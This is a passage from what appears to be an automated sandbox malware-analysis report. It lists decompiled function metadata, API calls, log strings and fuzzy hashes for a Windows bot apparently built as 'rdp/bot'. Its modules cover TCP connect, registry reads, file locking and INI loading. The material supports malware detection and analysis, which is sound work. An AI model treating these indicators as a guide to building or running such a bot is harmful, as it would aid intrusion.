                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                                                                                                  • API String ID: 548194777-214984806
                                                                                                                  • Opcode ID: 629659c426d93b8d57d096e2e37c2bf68a0892dfe24888d4cace9c6043ea66ad
                                                                                                                  • Instruction ID: 5e165798eb3d946468ca79faff21abc414b0ee1a22c1ae4c74fd44997a5351ff
                                                                                                                  • Opcode Fuzzy Hash: 629659c426d93b8d57d096e2e37c2bf68a0892dfe24888d4cace9c6043ea66ad
                                                                                                                  • Instruction Fuzzy Hash: 87815935A086C282FB61EF12A450BBDA6A1AF457A4FC44033DE4D47795EFADE905C360
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB68B7
                                                                                                                  • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB68F0
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB69C5
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB6AAA
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,00000157C50713D0,?,00007FF7C1AC8500,00007FF7C1AB1669), ref: 00007FF7C1AB6C1E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                                                                                                  • API String ID: 2747014929-2960251455
                                                                                                                  • Opcode ID: 8b8c3ce000e0cef59537ce36c0357b001427b7c3ce90e8d3888594aba3ae448c
                                                                                                                  • Instruction ID: 3dcda48a9095f45ef818d6e04e2d405be283e91b9ed10a63a65599741cad91ab
                                                                                                                  • Opcode Fuzzy Hash: 8b8c3ce000e0cef59537ce36c0357b001427b7c3ce90e8d3888594aba3ae448c
                                                                                                                  • Instruction Fuzzy Hash: 00810B70A4C78B81FB20FF54A450BBCA2509B11374E944233CD6E477E1EEEEA986D365
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                  • Opcode ID: 1de2c60ab64b2229bbcd90940721c67949cde75da0b91e5b5a21366dd128d970
                                                                                                                  • Instruction ID: 9171127a95b5d3814f832aa365c951f33d16b696eeb4c01200654d04bf98700a
                                                                                                                  • Opcode Fuzzy Hash: 1de2c60ab64b2229bbcd90940721c67949cde75da0b91e5b5a21366dd128d970
                                                                                                                  • Instruction Fuzzy Hash: F851B121A0DE43C2EF385F27E941AF96658AF457B8F042379E82E466F5EE7DE4058300
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                  • Opcode ID: ef2c9e022da29fa2bc4eb5b33516572d35ec7675e301cc468b5555df399c2eb0
                                                                                                                  • Instruction ID: e7b75cadf266eddee0feb3ecc3136eb95037321f8806b3f15ea1489933b2b20a
                                                                                                                  • Opcode Fuzzy Hash: ef2c9e022da29fa2bc4eb5b33516572d35ec7675e301cc468b5555df399c2eb0
                                                                                                                  • Instruction Fuzzy Hash: 09518F61B0CE4381EA249F1AE8002BE6690EF46F75F1422F7DD2E466F6DE7CE5158700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                  • Opcode ID: 57cc2912fc060d9ef2f48e6874cd69bdb85e37c9ded0e92350f58081cfba0796
                                                                                                                  • Instruction ID: 6c9f56ed9c81dccea791c0a0506ea70492d4db974391530b73ac1c3a3730f4bf
                                                                                                                  • Opcode Fuzzy Hash: 57cc2912fc060d9ef2f48e6874cd69bdb85e37c9ded0e92350f58081cfba0796
                                                                                                                  • Instruction Fuzzy Hash: 2A519379B0CF4292E6209B57A40027A7662BF96F74F1403F7E82D46AF5EE7DE5058700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                  • Opcode ID: c4e50038f105fe85b96ee30fc9bc49187e7416d53b1e2d5e671e6eceb2ce5a81
                                                                                                                  • Instruction ID: f1e06623b319b2a2c5f947524a92902df9f05c28e6c8cb68def1241b4ecbc6e4
                                                                                                                  • Opcode Fuzzy Hash: c4e50038f105fe85b96ee30fc9bc49187e7416d53b1e2d5e671e6eceb2ce5a81
                                                                                                                  • Instruction Fuzzy Hash: 6C51D321B1CE4282E7209B97E84027E775AAF84778F5403B9D92E476F5EFBCE5458700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                  • Opcode ID: 00be52f98493886c70a6fc4778f049fbd0ac6de21f4713c6c0349c451989cf9d
                                                                                                                  • Instruction ID: a4e8e206fae03f077d5d12388a7947ced50ab9c0a54502c878204bcedc588274
                                                                                                                  • Opcode Fuzzy Hash: 00be52f98493886c70a6fc4778f049fbd0ac6de21f4713c6c0349c451989cf9d
                                                                                                                  • Instruction Fuzzy Hash: 5251C465A0CE8381EB209B96EC013BFA698EF84770F941376E92E466F5DE3DF4058301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                  • Opcode ID: 16bc6f95adb63556d6d9dd7628c5118d99aff38ef0e314d2a351385bf1973825
                                                                                                                  • Instruction ID: 5d65fdccc5a5177e3f9fef671f1a865f259731f61d7f1dc274887219b9794a7d
                                                                                                                  • Opcode Fuzzy Hash: 16bc6f95adb63556d6d9dd7628c5118d99aff38ef0e314d2a351385bf1973825
                                                                                                                  • Instruction Fuzzy Hash: A951FB24E0DF43C2FF385F269485BF9125C9F04339F6463B6C96E462F1DE5E69868242
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                  • Opcode ID: 71f265c3c1eede2c7d2b485d5ac79c599bdc008be8f893485ec85ad0aa213f17
                                                                                                                  • Instruction ID: 886f93cc5bd0db728afd3c666d91797e571fbf98f663ecd011b7bf6fc22a61ad
                                                                                                                  • Opcode Fuzzy Hash: 71f265c3c1eede2c7d2b485d5ac79c599bdc008be8f893485ec85ad0aa213f17
                                                                                                                  • Instruction Fuzzy Hash: 3E510B20B0CF4382F6604B5EA5C43BD2254AF05B76F2422F7C96E062F5DE7DA9A59242
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                  • Opcode ID: 72c1952e04f3fafd5f39843409f0131d257733a5e654969ec2f207c9cf63f023
                                                                                                                  • Instruction ID: bd3b59d5bc894bb346800cb645a7e1f4d5338f2f17241a4172d35f4352cde3a1
                                                                                                                  • Opcode Fuzzy Hash: 72c1952e04f3fafd5f39843409f0131d257733a5e654969ec2f207c9cf63f023
                                                                                                                  • Instruction Fuzzy Hash: 8751E620F0CF03C2FA204796A5C037922A2DF57F74F6446F7C56E06AF5DE6DA8859262
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                  • Opcode ID: ecb98d2aab39831607e86e4dd35b83607107451fee7c1bb54a517d6ba907c02a
                                                                                                                  • Instruction ID: e5f8bbd744298312f49814e96d099dbbe1a1a85b8db0b9d2b65c8ee8a955a10c
                                                                                                                  • Opcode Fuzzy Hash: ecb98d2aab39831607e86e4dd35b83607107451fee7c1bb54a517d6ba907c02a
                                                                                                                  • Instruction Fuzzy Hash: 4E51F720E0CF0382F7619796A5C437C32999F05374F2457BAC56E162F1EFADEA859342
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                  • Opcode ID: a4765926d0bec962e3b64301d7cbedd34045c1c1f3eb295a71ea3bfcd381612a
                                                                                                                  • Instruction ID: 29962f0adcd3e2c513f443755b1ba9e76e63a906b51857df36bc60fec2b21b6d
                                                                                                                  • Opcode Fuzzy Hash: a4765926d0bec962e3b64301d7cbedd34045c1c1f3eb295a71ea3bfcd381612a
                                                                                                                  • Instruction Fuzzy Hash: 07513A61E0CF03C2FB2047DAAC803BB62999F05374FA453B6D56E462F5DE6DF8859281
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                  • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                                                                                                  • API String ID: 1423203057-455140666
                                                                                                                  • Opcode ID: 0c4040bc13b4473816842c2c01a7f90aad89fd73181495c49a8827ecfb7b12ea
                                                                                                                  • Instruction ID: 619ad546bdf83fd72d4934995831698c857979a89fb31608685dbb2397a4378b
                                                                                                                  • Opcode Fuzzy Hash: 0c4040bc13b4473816842c2c01a7f90aad89fd73181495c49a8827ecfb7b12ea
                                                                                                                  • Instruction Fuzzy Hash: 6BA1DEB2A0D6C685EB10EF15A410BBEAB51AF54BA4FC88133DE4D07785DEEDE585C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-910542497
                                                                                                                  • Opcode ID: d0835e459e24803f0fc88d3623f82c6b27cbd4b40818c2261843bf474927eb5e
                                                                                                                  • Instruction ID: cb150139cf4070f2a9f389c29e6dd7ba77d848f393274ea5e08b3f078a1d319f
                                                                                                                  • Opcode Fuzzy Hash: d0835e459e24803f0fc88d3623f82c6b27cbd4b40818c2261843bf474927eb5e
                                                                                                                  • Instruction Fuzzy Hash: F0A10CB094C68791FB21FF10A450BBDA650AF04764FD44233DE1E07691EEEEE989D326
                                                                                                                  APIs
                                                                                                                  Strings
